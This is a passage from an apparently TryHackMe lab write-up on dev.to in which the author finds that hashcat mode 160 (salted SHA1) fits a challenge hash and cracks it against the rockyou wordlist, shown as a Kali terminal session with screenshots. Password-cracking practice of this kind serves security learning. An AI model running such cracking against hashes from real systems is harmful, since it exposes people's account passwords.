src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F60gjxkny7jtq8hzy58xg.png" alt=" " width="800" height="88"></a></p> <p>But, unfortunately it didn't work :) then I sequentially search for other sha1 and salt type hash mode and I found this -&gt;</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhaop9hwoi0pe25veswgx.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhaop9hwoi0pe25veswgx.png" alt=" " width="800" height="236"></a><br> And with that 160 mode we cracked the hash -&gt;<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">┌──(kali㉿kali)-[~/password] </span><span class="gp">└─$</span><span class="w"> </span><span class="nb">echo</span> <span class="s1">'e5d8870e5bdd26602cab8dbe07a942c8669e56d6:tryhackme'</span> <span class="o">&gt;</span> hash.txt <span class="go"> ┌──(kali㉿kali)-[~/password] </span><span class="gp">└─$</span><span class="w"> </span>hashcat <span class="nt">-m</span> 160 <span class="nt">-a</span> 0 hash.txt /usr/share/wordlists/rockyou.txt <span class="go">hashcat (v7.1.2) starting </span><span class="gp">OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #</span>1 <span class="o">[</span>The pocl project] <span class="go">==================================================================================================================================================== </span><span class="gp">* Device #</span>01: cpu-sandybridge-12th Gen Intel<span class="o">(</span>R<span class="o">)</span> Core<span class="o">(</span>TM<span class="o">)</span> i5-12450H, 1466/2933 MB <span class="o">(</span>512 MB allocatable<span class="o">)</span>, 4MCU </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F64t6l6oqn9xywg4lxl8z.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F64t6l6oqn9xywg4lxl8z.png" alt=" " width="639" height="387"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5e2pgyz1nzwc6sjgubm2.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5e2pgyz1nzwc6sjgubm2.png" alt=" " width="800" height="155"></a></p> tryhackme cracking password linux